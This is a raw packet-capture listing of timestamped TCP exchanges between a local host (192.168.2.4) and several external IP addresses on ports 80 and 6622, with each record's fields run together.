                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.771162033 CEST5656680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.776454926 CEST805656644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.776649952 CEST5656680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.777057886 CEST5656680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.777076006 CEST5656680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.782440901 CEST805656644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.783060074 CEST805656644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.942658901 CEST662256565204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.942785978 CEST565656622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.942886114 CEST565656622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.948755026 CEST662256565204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.036391020 CEST565676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.042694092 CEST662256567204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.042996883 CEST565676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.048044920 CEST565676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.053359985 CEST662256567204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.331803083 CEST805656644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.332056046 CEST805656644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.332201958 CEST5656680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.332333088 CEST5656680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.337132931 CEST805656644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.358269930 CEST5656880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.363162041 CEST805656818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.363281012 CEST5656880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.364499092 CEST5656880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.364499092 CEST5656880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.369405985 CEST805656818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.369453907 CEST805656818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.524401903 CEST662256567204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.526900053 CEST565676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.526900053 CEST565676622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.532316923 CEST662256567204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.614701033 CEST565696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.619760990 CEST662256569204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.619838953 CEST565696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.625010014 CEST565696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.629868984 CEST662256569204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.694211960 CEST805656818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.694278002 CEST805656818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.694370031 CEST5656880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.694401979 CEST5656880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.700259924 CEST805656818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.713186979 CEST5657080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.718189001 CEST8056570172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.718274117 CEST5657080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.718386889 CEST5657080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.718416929 CEST5657080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.723886013 CEST8056570172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.723901033 CEST8056570172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.202322006 CEST8056570172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.202393055 CEST5657080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.202419996 CEST5657080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.204519033 CEST5657180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.207379103 CEST8056570172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.209445000 CEST8056571172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.209532022 CEST5657180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.209764957 CEST5657180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.209870100 CEST5657180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.215131044 CEST8056571172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.215163946 CEST8056571172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.720777035 CEST8056571172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.720899105 CEST5657180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.720969915 CEST5657180192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.726202011 CEST8056571172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.917674065 CEST5657280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.922797918 CEST805657234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.922945976 CEST5657280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.923083067 CEST5657280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.923166037 CEST5657280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.928452015 CEST805657234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.928580046 CEST805657234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.103579998 CEST662256569204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.103667021 CEST565696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.103802919 CEST565696622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.110174894 CEST662256569204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.192780972 CEST565736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.197954893 CEST662256573204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.198050022 CEST565736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.201914072 CEST565736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.207413912 CEST662256573204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.673113108 CEST805657234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.673290014 CEST5657280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.676440954 CEST805657234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.676613092 CEST5657280192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.678683043 CEST805657234.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.689826965 CEST5657480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.695265055 CEST805657418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.695342064 CEST5657480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.695569038 CEST5657480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.695606947 CEST5657480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.701009989 CEST805657418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.701410055 CEST805657418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.186736107 CEST805657418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.186861038 CEST805657418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.186916113 CEST5657480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.187057972 CEST5657480192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.191965103 CEST805657418.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.207911968 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.213535070 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.213614941 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.213722944 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.213747978 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.218770981 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.219311953 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.487334013 CEST805655282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.488826990 CEST5655280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.488878965 CEST5655280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.493901968 CEST805655282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.496366978 CEST5657680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.502171993 CEST805657682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.504863977 CEST5657680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.505059958 CEST5657680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.505091906 CEST5657680192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.510319948 CEST805657682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.510351896 CEST805657682.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.681147099 CEST662256573204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.681257963 CEST565736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.685197115 CEST565736622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.690118074 CEST662256573204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.710350990 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.713809967 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.713809967 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.719304085 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.719320059 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.770735025 CEST565776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.776206970 CEST662256577204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.776289940 CEST565776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.780993938 CEST565776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.785964012 CEST662256577204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.829890013 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.846586943 CEST5657880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.851613045 CEST805657813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.851742983 CEST5657880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.851948023 CEST5657880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.852025986 CEST5657880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.857165098 CEST805657813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.857198000 CEST805657813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.895361900 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.184781075 CEST805657813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.184817076 CEST805657813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.184915066 CEST5657880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.185072899 CEST5657880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.190186977 CEST805657813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.207115889 CEST5657980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.212563992 CEST805657944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.212645054 CEST5657980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.213012934 CEST5657980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.213012934 CEST5657980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.218185902 CEST805657944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.218224049 CEST805657944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.236923933 CEST662256577204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.238827944 CEST565776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.238898993 CEST565776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.243802071 CEST662256577204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.317888021 CEST565806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.323266983 CEST662256580204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.326838970 CEST565806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.339087009 CEST565806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.344206095 CEST662256580204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.411145926 CEST5657980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.414203882 CEST5658180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.419248104 CEST805658144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.422945976 CEST5658180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.423217058 CEST5658180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.423280001 CEST5658180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.428845882 CEST805658144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.428879976 CEST805658144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.887279034 CEST805658144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.887480974 CEST5658180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.887952089 CEST805658144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.888065100 CEST5658180192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.892393112 CEST805658144.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.901815891 CEST5658280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.907294989 CEST805658254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.907406092 CEST5658280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.907527924 CEST5658280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.907650948 CEST5658280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.912525892 CEST805658254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.912560940 CEST805658254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.629112959 CEST805658254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.630007982 CEST805658254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.630224943 CEST5658280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.630364895 CEST5658280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.635721922 CEST805658254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.652375937 CEST5658380192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.657706022 CEST805658335.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.658823013 CEST5658380192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.658972979 CEST5658380192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.659018993 CEST5658380192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.664107084 CEST805658335.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.664160967 CEST805658335.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.785806894 CEST662256580204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.785897970 CEST565806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.785974026 CEST565806622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.791214943 CEST662256580204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.864681005 CEST565846622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.869651079 CEST662256584204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.869777918 CEST565846622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.873613119 CEST565846622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.878751040 CEST662256584204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.388050079 CEST805658335.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.388236046 CEST805658335.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.388312101 CEST5658380192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.388432980 CEST5658380192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.393255949 CEST805658335.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.488768101 CEST5658580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.494009018 CEST80565853.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.494846106 CEST5658580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.495013952 CEST5658580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.495040894 CEST5658580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.500058889 CEST80565853.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.500483036 CEST80565853.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.977406025 CEST80565853.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.977682114 CEST5658580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.979410887 CEST80565853.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.979477882 CEST5658580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.984319925 CEST80565853.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.995007992 CEST5658680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.001311064 CEST8056586165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.001415968 CEST5658680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.001610041 CEST5658680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.001610041 CEST5658680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.007149935 CEST8056586165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.007302999 CEST8056586165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.330499887 CEST662256584204.10.160.212192.168.2.4
